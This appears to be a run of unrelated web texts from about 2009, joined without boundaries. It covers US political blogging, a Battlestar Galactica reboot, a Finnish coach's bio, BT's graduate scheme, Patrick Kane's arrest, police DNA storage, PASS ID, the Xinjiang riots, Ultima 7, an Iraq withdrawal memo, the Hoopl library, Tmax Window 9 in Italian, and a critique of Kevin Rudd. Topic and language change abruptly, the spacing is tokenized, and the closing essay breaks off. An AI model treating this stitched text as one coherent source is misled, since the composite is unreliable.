Weekly Standard , Gateway Pundit , The Huffington Post , Top of the Ticket , Moe_Lane ’s blog , The Moderate Voice , JammieWearingFool , JustOneMinute , The Atlantic Politics Channel , Le·gal In·sur·rec· tion , The Jawa Report , Boston Globe , Los Angeles Times , The Swamp , Townhall.com , QandO , Sense of Events , Flopping Aces , American Power , Daily Dose , Confederate Yankee , Hot Air , Riehl World View , Patterico ’s Pontifications , Political Byline , Below The Beltway , Politics Daily , Balloon Juice , YID With LID , Donklephant , Blue Crab Boulevard , Macsmind , Founding Bloggers , Scared Monkeys , Right Wing News , Think Progress , The Plum Line , Taylor Marsh , Atlas Shrugs , Don Surber , Raw Story , Perfunction , Pundit & Pundette , Dennis the Peasant , The Strata - Sphere , Michelle Malkin , Neptunus Lex , AmSpecBlog , Sister Toldjah , Cato @ Liberty , The Next Right , TPMDC , GayPatriot , Freedom ’s Lighthouse , Arkansas News , Shot in the Dark , The Campaign Spot , Sam Adams Alliance , LewRockwell.com Blog , The Caucus , Politics Nation , The Page , Instapundit , msnbc.com , Weasel Zippers , Firedoglake , NewsBusters.org , Cold Fury , No More Mister Nice Blog , Weekly Standard , The Huffington Post , Dr. Melissa Clouthier , The Swamp , JammieWearingFool , Gateway Pundit , Pat Dollard Power Line , and Newsalert are among those weighing in , as aggregated by the good robots at Memeorandum .
Now , Congressmen probably should n’t go around calling their fellow countrymen “ un-American . ”
It ’s unhelpful in persuading opponents and not particularly shrewd politically .
But , considering that I both disagree with Pelosi and Hoyer on the direction we should take our national health care policy and preceded them by three days in asserting that “ we should be able to agree that shutting down public debate on the matter in the guise of ‘ being heard ’ is not only unproductive but un-American , ” I ’m hard pressed to muster much outrage over this one .
… Especially if it ’s going to ignore storylines that have just happened
At the risk of sounding hypocritical , I think it ’s a bit too early for Bryan Singer to return to the Battlestar Galactica franchise and to try and kickstart his 2001 idea on continuing the original 1978 series .
It ’s not that I do n’t want to see it happen .
I ’ve always been for continuing the story that Glen Larson first brought to television screens on ABC when I was just two years old , but why do we have to talk about this just months after the critically acclaimed SciFi Channel ( now Syfy ) series has ended its storied run ?
Talk about market confusion .
One thing that made the reimagination of “ Battlestar Galactica ” work in the first place is that it had been decades since the original story was told , so some sort of modernization of the story , concept and characters was in order .
But doing it all over again so soon after it had just been done ?
Why ca n’t we simply wait even a few years ?
Granted , by the time Singer and company can punch out a story idea and get it going , it will likely be a few years , but we need some time to enjoy what we had with Ronald D. Moore ’s vision .
Imagine what it would ’ve been like if Ronald D. Moore decided to bring his idea of “ Battlestar Galactica ” out in 1979 rather than 2003 .
Would that have been fair at all to the franchise ?
Fans of the original series were incensed as it was 25 years later … less than a year later ?
There may have been riots .
NBC Universal , which now has the movie rights of the franchise , are trying to cash in while the Battlestar Galactica iron is hot , but why do it with something that has nothing to do with the series that helped bring it almost back to the mainstream ?
The same goes for the idea to continue toward a new “ Buffy the Vampire Slayer ” movie that has nothing to do with the television series that actually made vampire killing cool again .
Audiences are n’t dumb .
They have pretty good memories , especially when they just saw something only a few years , or even a few weeks ago .
I would love to see what Bryan Singer will do with the franchise , and see how he could ’ve done this with Fox before Moore got involved .
But not yet .
Not yet .
Katía
Olen Katía Uusikartano , sosiaalipsykologi , LCF ® Life Coach ja intohimoinen yrittäjä .
Valmentajana olen lämminhenkinen kuuntelija ja taitava tsemppaaja , mentorina innostava sparraaja .
Missioni on tuottaa Suomeen lisää energiaa paremmilla yöunilla ja saada ihmiset elämään omannäköistä elämäänsä sekä auttaa yrittäjiä menestymään ja kukoistamaan .
Rakastan tanssimista , puutarhanhoitoa , Barcelonaa , hyviä keskusteluja , luonnossa kävelyä ja tietysti perhettäni , johon kuuluu kolme eläväistä lasta ja huomattavasti rauhallisempi insinööri .
Kuten monien muidenkin , on minunkin elämääni mahtunut monenlaisia vastoinkäymisiä , kriisejä ja muutostilanteita .
Samoin kuin isoja onnistumisia , menestystä , suurta rakkautta ja iloa .
Jälkikäteen ajateltuna kaikki nämä ovat valmistaneet minua tähän työhön ja tuoneet syvempää ymmärrystä elämän monimuotoisuuteen .
On sinun valintasi , kerrotko itsestäsi selviytymistarinaa vai marttyyritarinaa .
Minä valitsin ensimmäisen .
We know because he said so , in the first of many famous speeches , that Barack Obama does n’t see Red America or Blue America  he only sees the United States of America .
But as the president contemplates his faltering poll numbers and his stalling health - care push , he might want to consider a more colorful perspective .
The red - blue contrast is often overdrawn .
But it ’s a sensible way to understand Obama ’s summer struggles .
On health care , energy , taxes and spending , he ’s pushing a blue - state agenda during a recession that ’s exposed some of the blue - state model ’s weaknesses , and some of the red - state model ’s strengths .
Consider Texas and California .
In the Bush years , liberal polemicists turned the president ’s home state  pious , lightly regulated , stingy with public services and mad for sprawl  into a symbol of everything that was barbaric about Republican America .
Meanwhile , California , always liberalism ’s favorite laboratory , was passing global - warming legislation , pouring billions into stem - cell research , and seemed to be negotiating its way toward universal health care .
But flash forward to the current recession , and suddenly Texas looks like a model citizen .
The Lone Star kept growing well after the country had dipped into recession .
Its unemployment rate and foreclosure rate are both well below the national average .
It ’s one of only six states that did n’t run budget deficits in 2009 .
BT has temporarily stopped its graduate recruitment scheme , citing the recession .
The scheme traditionally employs 130 graduates to be trained in one of three areas ICT , professional management or HR / marketing .
The company receives thousands of applications each year .
In a statement , a company spokesperson said : " BT can confirm that it has decided to cease its graduate recruitment programme for the time being , as a result of the current economic environment and pressure on staff numbers . "
" BT will be reviewing the status of its graduate programme on an ongoing basis and we are working to maintain our relationships on campus with students , faculty and career management services . "
The company said that those currently working for them under the graduate scheme will continue to be supported .
BT is one on the largest employers in the country , but it recently faced scrutiny for cutting 10 per cent of its global workforce - amounting to 15,000 employees - after the same number the previous year .
The job cuts were down to huge losses in its Global Services division which also led to the resignation of its chief executive , Franois Barrault - albeit with a significant payoff .
In a town just waiting for Terrell Owens to make his first stupid move , a 20 - year - old , baby - faced All - American Boy who plays for the damn Blackhawks suddenly became Buffalo ’s new badass .
Patrick Kane plays a sport most known for its fighting .
He ’s been singled out on the ice by opponents , smashed into the boards , slashed , tripped , poked … you name it — and he ’s never once dropped his gloves in the NHL .
But 20 cents ?
Two dimes ?
Four nickels ?
Oh , now it ’s time to rumble .
Where was T.O. this weekend ?
Playing an organized football game on national television without incident .
He even found it in his heart to praise his quarterback .
Kane , on the other hand , was out in Buffalo ’s nightlife scene well past his bedtime yelling , “ You do n’t know who you ’re fucking with ! ” to a cab driver while punching him in the face and breaking his glasses .
I think I ’ve found Bizarro World .
I do n’t have to re-hash T.O. ’s idiocy .
He ’s done enough talking on his own .
Yet it ’s Kane with his mugshot circulating on television and in the newspapers .
The soft - spoken kid with a supposed heart of gold and talent beyond his years has the sports world wondering who to trust .
The Buffalo Bills signed T.O. in large part because they needed the publicity — good or bad .
The most unlikely athlete stole the spotlight over 20 cents .
Relating this further into football terms , Kane ’s late - night run-in with Buffalo ’s Finest would be like Tom Brady punching a bartender over a $ 7 drink in Boston .
It ’s just as unlikely as what happened with Kane — or so we thought .
If your jaw did n’t drop when finding out the news Kane was involved in such an incident , you either do n’t know enough about hockey or you ’re just an idiot .
If T.O. did something like this in Buffalo , we all would have shrugged , maybe laughed a bit and then waited for ESPN to discuss it for the next 20 weeks .
Somehow , Kane was able to do the impossible — switch public images with Terrell Owens .
Now , it will be the sweet little boy facing questions about his maturity during the Off - Season From Hell and into the 2009 - 10 campaign .
And somehow T.O is getting a free pass .
Follow me on Twitter : @blackhawksup
DNA samples : Careful handling required West Yorkshire Police have been storing DNA samples from suspects and car crash victims in a freezer also used for ice cream , a watchdogs ' report has said .
The criticism comes in a report from the prisons watchdog and the chief inspector of constabulary .
The inspectors said the management of the samples needed urgent attention to avoid undermining prosecutions .
West Yorkshire Police said the samples found in the freezer were of " no value " and would not have been analysed .
The inspectors also said staff at police custody suites had been confused about which sample belonged to which suspect .
West Yorkshire Police have 13 blocks of cells legally approved to hold suspects following their arrest .
Inspectors from the two watchdogs visited a sample of these cells and accompanying facilities in Leeds and Bradford in October 2008 .
Labelling
The watchdogs said they were concerned about how officers were handling DNA , blood and urine samples taken in the custody suites , many of which would be used as evidence in prosecutions .
" Samples were incorrectly stored in fridges and freezers alongside ice cream , with some improperly bagged , " said the report .
" This led to confusion among staff tasked with submitting samples , so many were not submitted for analysis and had been allowed to remain in freezers for a number of years . "
One sample , labelled as relating to someone killed in a traffic accident , had neither been sent for toxicology tests or disposed of .
" We were unsure whether it really related to a road death investigation or whether there was an error on the label , " the report said .
The watchdogs said that some freezers were insecure and some samples had defrosted .
" The force was potentially missing opportunities to bring offenders to justice and solve old cases , " said the inspectors .
" These practices were exposing the force to unacceptable levels of risk .
The maintenance of public confidence in forensic evidence is crucial . "
A spokeswoman for West Yorkshire Police said : " " The report refers to one instance of ice cream being found in a fridge near forensic samples .
" These samples were hair , blood , urine and fingernail samples from people who had been eliminated from criminal enquiries .
" [ The samples ] were of no further value and there was no intention of either subjecting them to analysis or putting them on the DNA database . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
In February , the opponents of REAL ID were given a bit of hope when Homeland Security Secretary Janet Napolitano said that she wanted to repeal the REAL ID Act , the federal government 's failed plan to impose a national identification card through state driver 's licenses .
But what has taken place since is no return to sanity , as political machinations have produced a cosmetic makeover called " PASS ID " that has revived the push for a national identification card .
The PASS ID Act ( S. 1261 ) seeks to make many of the same ineffectual , dangerous changes the REAL ID Act attempted to impose .
Fundamentally , PASS ID operates on the same flawed premise of REAL ID -- that requiring various " identity documents " ( and storing that information in databases for later access ) will magically make state drivers ' licenses more legitimate , which will in turn improve national security .
Proponents seem to be blind to the systemic impotence of such an identification card scheme .
Individuals originally motivated to obtain and use fake IDs will instead use fake identity documents to procure " real " drivers ' licenses .
PASS ID creates new risks -- it calls for the scanning and storage of copies of applicants ' identity documents ( birth certificates , visas , etc. ) .
These documents will be stored in databases that will become leaky honeypots of sensitive personal data , prime targets for malicious identity thieves or otherwise accessible by individuals authorized to obtain documents from the database .
Despite some alterations to the scheme , PASS ID is still bad for privacy in many of the same ways the REAL ID was .
And proponents of the national ID effort seem blissfully unaware of the creepy implications of a " papers please " mentality that may grow from the issuance of mandatory federal identification cards .
Despite token provisions that claim to give states the freedom to issue non-federal identification cards , the card will be mandatory for most -- the PASS ID
Act seeks to require everyone to show the federally recognized ID for " any official purpose , " including boarding a plane or entering a federal building .
At the moment , health care reform is commanding tremendous attention and effort on the hill , so the PASS ID Act seems to be on the backburner for now .
But after the August recess , anything can happen .
So stay tuned for more about PASS ID and critical opportunities to flag your opposition to this flawed national ID scheme .
At least 140 people have been killed in rioting in the capital of China 's northwestern region of Xinjiang , with the government blaming exiled separatists for the Muslim area 's worst case of unrest in years .
Download the new Independent Premium app Sharing the full story , not just the headlines
Hundreds of rioters have been arrested , the official Xinhua news agency reported , after rock - throwing Uighurs took to the streets of the regional capital yesterday , some burning and smashing vehicles and confronting ranks of anti-riot police .
The unrest underscores the volatile ethnic tensions that have accompanied China 's growing economic and political stake in its western frontiers .
But independent analysts said the trouble in the resource - rich region was unlikely to have a major impact on China 's economy because of the remoteness of the area and limited access .
Beijing 's image as a responsible power , though , may take a hit .
" In terms of China 's domestic economy , it is in a remote place and it does not have a big impact on things generally unless there is some evidence , of which there is none , that the government is in some meaningful way losing control , " said Arthur Kroeber , Managing Director of Dragonomics , a research and advisory firm in Beijing .
A senior Chinese government official said the unrest was the work of extremist forces abroad , signalling a security crackdown in the strategic region near Pakistan and central Asia .
Residents in the Xinjiang 's regional capital Urumqi were unable to access the Internet on Monday , several said .
" The city is basically under martial law , " Yang Jin , a dried fruit merchant , said by telephone .
Chinese state television showed rioters throwing rocks at police and overturning a police car , and smoke billowing from burning vehicles .
Li Zhi , the Communist Party boss of Urumqi told a news conference that the death toll from the rioting had risen to 140 , the semi-official China News Agency said .
Xinhua said 816 people were injured and hospitalised .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
Police rounded up " several hundred " who participated in the violence , including more than 10 key players who fanned unrest , Xinhua said , and are searching for 90 others .
" For whoever was behind the riot , or for whatever intentions they had in masterminding the bloodshed , one thing is clear : under no circumstances should slaughters be brooked , violence allowed or national security challenged , " according to a Xinhua commentary .
The riot in Urumqi , a city of 2.3 million residents 3,270 km ( 2,050 miles ) west of Beijing , followed a protest against government handling of a June clash between Han Chinese and Uighur factory workers in southern China , where two Uighurs died in Shaoguan .
The China Daily put the number of protesters at 300 to 500 while the exiled Uyghur American Association had it as high as 3,000 .
An unnamed Chinese official said the " unrest was masterminded by the World Uyghur Congress led by Rebiya Kadeer " , according to Xinhua .
" This was a crime of violence that was pre-meditated and organised , " said the report .
Rebiya Kadeer is a Uighur businesswoman now in exile in the United States after years in jail , and accused of separatist activities .
She did not answer calls for comment .
But exiled Uighur groups adamantly rejected the Chinese government claim of a plot .
They said the riot was an outpouring of pent - up anger over government policies and Han Chinese dominance of economic opportunities .
" They 're blaming us as a way to distract the Uighurs ' attention from the discrimination and oppression that sparked this protest , " said Dilxat Raxit , a spokesman for the World Uyghur Congress in exile in Sweden .
Xinjiang is the doorway to China 's trade and energy ties with central Asia , and is itself rich in gas , minerals and farm produce .
But many Uighurs say they see little of that wealth .
" In Xinjiang one of the major sources of discontent is that there is still a major gap economically between Han and Uighurs , " said Barry Sautman , a specialist on China 's ethnic politics at the Hong Kong University of Science and Technology .
Almost half of Xinjiang 's 20 million people are Uighurs .
The population of Urumqi is mostly Han Chinese , and the city is under tight police security even in normal times .
" I personally saw several Han people being stabbed .
Many people on buses were scared witless , " Zhang Wanxin , a Urumqi resident , said by telephone .
Ultima 7 - The Black Gate
It has been two centuries since the Avatar last appeared in our good kingdom .
Some have written that at last it is possible to interpret the tales of the Avatar as they should be , with the proper historical perspective .
Some argue that as time moves on , the truth of what actually occurred will fade even further away and that we have a responsibility to preserve the legends as we now know them .
However , most agree when it comes to a number of basic theories .
While there are those who maintain that the stories of the Avatar are only myths , practically all credible scholars say that at least some elements of the Avatar ’s tales are historical fact .
In reality , one need look no further than the Isle of the Avatar to see very persuasive evidence that the Avatar did indeed exist - at least as a person if not as a spiritual being !
It is most likely that there has been more than one Avatar .
All of the writings insist that the Avatar who negotiated the peace between Britannia and the gargoyles is the one and same person who first appeared to vanquish the sorcerer Mondain those many years ago .
While saying it is most unlikely , historians do not firmly deny the possibility of there having been only on Avatar .
After all , our good sovereign monarch , wise Lord British , has himself displayed an amazing longevity !
Whatever interpretation of history proves to be most accurate , it seems undeniable that the Avatar will not return to our fair kingdom .
By all indications the age of magic is coming to an end .
With the decline on reliability of mages , and with the kingdom turning away from the magical arts , it is doubtful that extreme danger - that which would require an Avatar ’s aid to defeat it - will ever return to Britannia .
And thankfully so .
Upon us is the age of The Fellowship , in which one does not simply wait in anticipation for a heroic savior when a crisis occurs .
In this less spectacular but more practical day , we are left to solve our problems with our own minds and our own will .
Developed by : Origin Systems Inc Artificers of some of the greatest gaming franchises the world has ever known they are , and forever will be , scions of a golden age .
We salute you , Origin .
We salute you .
Established in 1983 , Origin ( or Origin Systems ) has become well known their Wing Commander , Ultima and Privateer titles .
Acquired by Electronic
Arts in the early 90's , Origin has recently been working on internet - only software , with the Ultima Online series .
Multiplayer : No Multiplayer Platform : Rated : 9 x Current rating : Uploaded by : Anonymous
Your rating : Not rated - login - and rate
Screenshots
This game is not Freeware , Shareware or Abandonware
What does it mean ?
We allow any archive to be uplodaded to our site , however if we find out that there is still active holder of copyright and / or this game is being actively sold we promtly delete such archive .
Thanks to interest in old games some game development companies ( or what was left of them ) sold rights to old titles to companies like Steam or GOG ,
which are porting old games to new platforms and selling them again .
That 's why - for this game - you wo n't find link to download anymore and we 'll block any attemt to re-upload this game .
You can filter out non-downloadable games by selecting " Only free and downloadable games " in top navigation bar .
Via buy button you can buy this game from one such seller .
This button is provided solely for comfort of people interested in this game and we get no financial or other benefit from doing so .
( Also we can't be hold responsible for any problems you 'll encounter when buying or installing game via this link - please ask seller support if you encounter any compatibility problem ) .
Senior Military Official : U.S. Should Withdraw From Iraq Next Year
Created : July 30 , 2009 11:17 | Last updated : July 31 , 2020 00:00
U.S. Army Soldiers in Iraq ( U.S. Army photo )
A recent memo authored by a senior U.S. military official questions the basic rationale for keeping U.S. troops in Iraq until 2011 as the Obama administration has decided , arguing that U.S. troops have reached a point of “ diminishing returns ” in training the Iraqi security forces and risk jeopardizing both a future positive relationship with Baghdad by staying for another two and a half years and the safety of U.S. forces .
The short memo , written by Army Col. Timothy R. Reese , chief of the Baghdad Operations Command Advisory Team for Multinational Division - Baghdad , argues that all U.S. troops “ smell bad to the Iraqi nose , ” and accordingly suffer under laborious operational restrictions placed upon them by the Status of Forces Agreement signed by the U.S. and Iraq in late 2008 .
In particular , since the June 30 pullback of U.S. forces from Iraqi towns and cities , Reese , a high - ranking liaison to Iraqi security forces , writes that the Iraqi forces have placed “ unilateral restrictions on U.S. forces that violate the most basic aspects ” of the accord , including a “ forcible takeover ” of an entry point within the so - called Green Zone .
“ The security of U.S. forces are at risk , ” he writes .
Illustration by : Matt Mahurin
As a result , Reese contends , “ we should declare our intentions to withdraw all U.S. military forces from Iraq by August 2010 , ” a schedule that he says represents not “ a strategic paradigm shift , but an acceleration of existing U.S. plans by some 15 months . ”
There are currently 130,000 troops in Iraq , a number scheduled to remain fairly static until early next year , after which the Obama administration and Reese ’s senior theater commander , Gen. Raymond Odierno , intend to remove all combat brigades , leaving between 30,000 and 55,000 troops in Iraq as advisers until December 2011 , as allowed in the SOFA .
Yet Reese argues in his memo — evidently written in mid-July — that the United States no longer possesses sufficient leverage to influence a host of Iraqi military and governmental problems , which the administration has cited to justify the presence of U.S. forces through 2011 .
But he contends that security has improved to the point where even an Iraqi military that he considers poor can keep the county from a much - feared internal collapse without the aid of U.S. forces .
“ Perhaps it is one of those infamous paradoxes of counterinsurgency that while the ISF [ Iraqi security forces ] is not good in any objective sense , it is good enough for Iraq in 2009 , ” Reese writes .
The Iraqi military that Reese advises comes in for a withering assessment .
Although he writes that the U.S. can be “ justifiably proud ” that the Iraqi military has “ defeated the organized insurgency , ” any opportunity for bequeathing Iraq a professional military free from a “ Baathist - Soviet model ” is “ now long past , ” and U.S. forces cannot change the situation by 2011 .
Reese criticizes the Iraqi military for “ endemic ” laziness , corruption , nepotism , mistreatment of enlisted soldiers , and worse .
The Iraqi Ministry of Defense and its Baghdad Operations Command are untrustworthy , incompetent and unable to “ stand up to Shiite political parties , ” despite “ all the fawning praise we bestow ” on both organizations .
Reese ’s assessment of Iraqi government performance is even harsher .
He writes that reconciliation of the ruling Shiites with former Sunni insurgents and rejectionists is “ at a standstill , and probably going backwards , ” nor is there movement to resolve Arab - Kurdish tensions in the north .
Corruption and incompetence in the ministries is “ the stuff of legend , ” with Prime Minister Nouri al - Maliki ’s much - touted anti-corruption measures a mere “ campaign tool . ”
Essential services like electricity still are unable to meet the needs of Iraqis , and the government does not take “ rational steps ” to improve them .
“ The general lack of progress in essential services and good governance is now so broad that it ought to be clear that we no longer are moving the Iraqis ‘ forward , ’ ” Reese writes .
The memo , according to several people who have read it , has made its way in defense circles for at least a few days .
On Tuesday , a blog called Snuffysmith posted the memo ’s contents , which were independently obtained by The Washington Independent .
According to GoogleCache , another blog on the conservative Townhall network , The Enchanters ’ Corner , posted it on Monday , but the blog is currently blank .
Its bio page lists its author as “ Tim The Enchanter , ” a member of the U.S. Army “ on active duty for almost 30 years ” who is currently serving “ in Iraq as an advisor to the Iraqi security forces . ”
According to an official bio , Reese received his first Army commission in 1981 .
Several efforts to reach him were unsuccessful .
( As this piece was going to press , the New York Times published a piece about the memo as well . )
Reese is known in the Army as a historian as well an armor officer .
In 2008 , he and a colleague published a well - regarded study of the Army ’s experiences in Iraq following the fall of Baghdad until January 2005 , titled “ On Point II . ” Col. Gian Gentile , who led a battalion in Baghdad before the surge , said that Reese ’s work on “ On Point II ” demonstrated that he is a “ credible source , ” and called his memo a “ powerful and important view ” of the U.S. ’s situation in Iraq .
Douglas Ollivant , a former chief of plans for Multinational Division - Baghdad who left the White House last month as Iraq director , said there was “ a grain of truth to the picture he paints , ” but said that Reese ’s account “ is exaggerated , and does not account for Iraqi political reality . ”
Among other points , Ollivant critiqued Reese for not addressing what accelerating withdrawal “ would do to our equipment withdrawal plan ” or the “ transition to State [ Department ] control . ”
Messages left for a spokesman for Gen.
Odierno were not answered by press time .
Home » forums » LtU Forum Hoopl : Dataflow Optimization Made Simple Hoopl : Dataflow Optimization Made Simple by Norman Ramsey , JoÃ£o Dias , and Simon Peyton Jones .
We present Hoopl , a Haskell library that makes it easy for compiler writers to implement program transformations based on dataflow analyses .
The compiler writer must identify ( a ) logical assertions on which the transformation will be based ; ( b ) a representation of such assertions , which should form a lattice of finite height ; ( c ) transfer functions that approximate weakest preconditions or strongest postconditions over the assertions ; and ( d ) rewrite functions whose soundness is justified by the assertions .
Hoopl uses the algorithm of Lerner , Grove , and Chambers ( 2002 ) , which can compose very simple analyses and transformations in a way that achieves the same precision as complex , handwritten ``super - analyses . ''
Hoopl will be the workhorse of a new back end for the Glasgow Haskell Compiler ( version 6.12 , forthcoming ) .
A continuation of work previously mentioned on LtU here .
Original people , new language .
More purity , more goodness .
Sinfully , there does not yet seem to be a hackage package .
Comment viewing options
Flat list - collapsed Flat list - expanded Threaded list - collapsed Threaded list - expanded Date - newest first Date - oldest first Select your preferred way to display the comments and click " Save settings " to activate your changes .
I coreani si cimentano in un nuovo ambizioso progetto : l'azienda TmaxCore ha infatti preannunciato il debutto , per prossimo novembre , di un nuovo sistema operativo : Window 9 .
Compatibilità assicurata con tutti i software progettati per Microsoft Windows e DBMS integrato .
Una nuova alternativa al sistema operativo Microsoft Windows proviene dalla Corea : si chiama Tmax Window 9 e sarà disponibile all 'acquisto a partire da questo Novembre , dunque poco dopo il rilascio di Windows 7 .
Il nome Window 9 , per quanto possa sembrare decisamente scopiazzato da Windows 7 , è in realtà libero da qualunque copyright : Microsoft ha infatti parlato di Windows 7 , di Windows 8 ma del " numero 9 " non ha mai fatto voce .
La TmaxCore ha annunciato il suo nuovo sistema operativo per PC al TmaxDay2009 , tenutosi a Seoul lo scorso 7 luglio .
TmaxCore è affiliata con TmaxSoft , la più grande azienda software coreana .
Potrebbe quindi trattarsi di un sistema operativo " serio " e non ( soltanto ) scopiazzato dal ben più popolare ed affermato Windows .
In realtà vi è qualche aspetto che potrebbe far pensare a rassomiglianze architetturali con Windows .
In primo luogo l'assicurata compatibilità con tutte le applicazioni per Windows presenti e future ( si parla di " supporto al 100 % " ) .
TmaxCore ha inoltre condotto un lavoro certosino prima di dare il via allo sviluppo del suo Window 9 : l'azienda è infatti dapprima entrata in contatto con i principali produttori di hardware e assemblatori di PC per condurre test di compatibilità driver ed è giunta a poter affermare che Window 9 è oramai praticamente ultimato e sarà disponibile prima di fine anno .
Dopo un mese di prova gratuita ( il " test drive " verrà offerto per tutto ottobre ) , Tmax Window sarà disponibile all 'acquisto e dovrebbe inoltre essere proposto ad un prezzo di molto inferiore rispetto a quello d'acquisto di Microsoft Windows .
Al momento Microsoft Windows detiene il 99 % del mercato coreano : non vi è dunque , allo stato attuale , alcun concorrente .
Window 9 potrebbe , secondo l'azienda , stravolgere la situazione .
Non sono noti al momento dettagli tecnici su Window 9 , tuttavia è già noto che :
E ' compatibile con Microsoft Windows e con la suite Microsoft Office ;
Stabilità garantita da un micro-kernel ;
Compatibilità con le applicazioni progettate per altri sistemi operativi ;
Tool DBMS ( DataBase Management System ) incluso nel sistema ;
Impostazioni di sicurezza " su misura " ;
Interfaccia grafica che assomiglia molto a quella di Windows .
Durante la dimostrazione pubblica del TmaxDay2009 , l'azienda ha mostrato non solo la velocità e la leggerezza del suo nuovo sistema operativo ( entrambe maggiori rispetto a Windows ) ma anche la compatibilità con alcuni software popolari , eseguendo su tale OS il browser Internet Explorer e la suite Microsoft Office .
Secondo il Chariman di TmaxSoft , nel prossimo futuro sarà il software il principale propulsore della competitività internazionale della Corea : per questo l'azienda ha sviluppato Tmax Window rendendolo compatibile con diversi campi di applicazione : non solo desktop ma anche netbook , ATM e sistemi POS .
TmaxCore ha inoltre annunciato di essere già al lavoro su due software da integrare con Tmax Window 9 : Tmax Office ( una suite di produttività ) e Tmax Scouter ( un web browser ) .
Entrambi supporteranno tutti gli attuali standard software di compatibilità .
E così , dopo Nokla e Cect , gli inarrestabili asiatici ci riprovano ancora ...
Concludo riportando un video pubblicato su YouTube che mostra Window 9 all 'opera .
Come è possibile notare , graficamente parlando assomiglia davvero tanto a Windows XP :
Ulteriori video disponibili , sempre su YouTube , a QUESTO link .
“ The pain of recovery ” : Rudd ’s declaration of war on the working class
By Nick Beams
31 July 2009
Australian Prime Minister Kevin Rudd ’s latest essay “ Pain on the road to recovery ” , published in the Sydney Morning Herald on July 25 , could be more accurately titled “ A declaration of war against the working class ” .
The essay was prepared after Rudd ’s return from discussions at the G8 summit in Italy , and followed several months of criticism in the Murdoch media that the prime minister was abandoning his credentials as an “ economic conservative ” .
That criticism was prompted by an earlier essay , published in the February edition of the Monthly , at the height of the global financial crisis , in which Rudd attacked the “ free - market ideology ” of “ neo-liberalism ” .
In a speech delivered in Berlin on July 7 on the necessity for an “ exit strategy ” , Rudd made clear he understood that the essential task confronting his , and other governments around the world , was to ensure that the massive cost of government bank bailouts and stimulus packages would be extracted from the working class through savage budget cuts .
The Murdoch press immediately signaled its approval with an editorial in the Australian on July 9 entitled “ Welcome return of fiscal conservative ” declaring that Rudd had “ taken an international lead in constructive , rational economic policy discussion ” .
The latest essay elaborates on the themes of the Berlin speech , but goes much further .
The government ’s economic strategy will not only “ involve tough choices and require Australians to accept difficult and unpopular budget cuts ” it will “ bring with it one of the most significant changes in global and domestic economic policy settings Australians have experienced . ”
While the essay contains references to “ excessive greed ” , “ neo-liberal fundamentalism ” and “ corporate cowboys ” — denunciations of this sort remain useful while the government is handing out tens of billions of dollars to prop up the major corporations and insure bank profits — it contains a significant shift in Rudd ’s “ explanation ” of the crisis .
Back in February , when the task was “ saving capitalism from itself ” , the prime minister placed emphasis on the failings of “ free market ideology ” as the cause of the crisis .
Now that his agenda has shifted to making the working class pay for the rescue operation , his rhetoric has moved to denunciations of “ excess consumption ” .
According to Rudd : “ The roots of the crisis lie in the preceding decade of excess .
In it the world enjoyed an extraordinary boom : living standards rose faster than at any time in recent memory ; global economic growth reached a peak of 5.1 percent in 2007 , the highest global growth rate in more than three decades . ”
While Rudd fails to recognise it , this explanation constitutes a damning indictment of the capitalist system .
In the years immediately preceding the crisis , world economic growth briefly returned to levels not seen since the end of the post - war boom .
But , notwithstanding the enormous increases in productivity since that time — based on technological advances in computerization and communications — this economic growth proved to be not only unsustainable , but the cause of the most severe financial and economic crisis since the Great Depression of the 1930s .
In the United States , Rudd writes , outlining his new explanation of the crisis , “ consumers went on a long , debt - fuelled shopping spree ” with household debt increasing from about 65 percent of income in 1983 to nearly 140 percent by 2007 .
Likewise , in Australia “ consumers also spent up big ” leading to a 340 percent increase in household debt from 1996 to 2007 .
Rudd blames “ excess consumption ” for the crisis in order to advance his government ’s agenda — reducing the consumption of millions of ordinary working class families while increasing the profits of the banks and major corporations .
In the US and Australia , as well as in other major capitalist countries such as Britain , household debt has massively increased .
But to cite these increases as the cause of the global financial crisis is simply another case of “ lies , damn lies and statistics ” .
To blame the crisis on household debt is to put the cart before the horse .
By far the largest proportion of the increase has resulted from spiraling mortgage debts incurred as a result of escalating house prices .
But the rise in house prices was not caused by the demands of home - buyers .
Housing has been one of the asset bubbles created continuously over the past two decades by the policies of the US Federal Reserve and other central banks to ensure the profitability of the banks and financial corporations .
Home - buyers did not invent securitization of debt , collateralized debt obligations and the myriad derivative instruments used to create one financial bubble after another .
These were the products of high - level “ financial innovation ” that resulted , among other things , in higher housing prices , forcing working class families to take on unprecedented levels of debt if they wanted to buy a home .
Another major cause of increased household debt has been the decline in real wages .
Wage levels peaked in the US in 1973 , thereafter falling for almost a quarter of a century .
There was a small increase at the end of the 1990s but after the recession of 2001 median household income declined in real terms .
Increased credit card debt and equity withdrawals from home mortgages were two of the so - called “ coping mechanisms ” employed by families to try to counter the wages fall .
The same processes have been at work in Australia .
For 30 years after World War 2 , real wages increased by 2 - 3 percent per annum .
After 1975 these increases ceased , with the result that in 1995 it is estimated that real wages were 20 - 30 percent below where they would have been had the post - war rises continued .
In the past three decades income has been redistributed away from wages to profits .
In 2008 the profit share of total income was a record 27 percent , with wages at 53 percent .
In 1992 the figures were 21 and 56 percent respectively .
In 1975 , at the peak of the post - war boom , the share of wages in national income was 62.4 percent .
In his essay , Rudd provides figures that indicate the scope of the various government bailouts .
They also point to the dimensions of the assault now being prepared .
Governments in the major capitalist countries have implemented taxpayer - funded guarantees for the banks amounting to $ 6.2 trillion , or 8 percent of global GDP .
On top of this , they have allocated $ 2 trillion to fund bank bailouts and recapitalizations .
In addition , G20 governments are expected to spend a total of $ 5 trillion on stimulus packages by the end of next year , equivalent to nearly 8 percent of global GDP .
In all , the measures are equivalent to around 18 percent of global GDP .
The average budget deficit for OECD economies has increased more than sixfold from 1.4 percent of GDP before the crisis , to an expected 8.8 percent by the end of 2010 .
This means that in 2010 , public sector debt will rise to more than 100 percent of GDP .
In its budget brought down last May , the Rudd Labor government forecast that public debt would rise to around $ 315 billion in 2013 - 14 and committed itself to returning the budget to surplus by 2015 - 2016 .
In order to cut spending , it lifted the retirement age from 65 to 67 , the first in what will be a series of socially regressive measures .
A key plank of Labor ’s budget was its commitment to keep the real increase in federal spending to 2 per cent of GDP for an indefinite period to come .
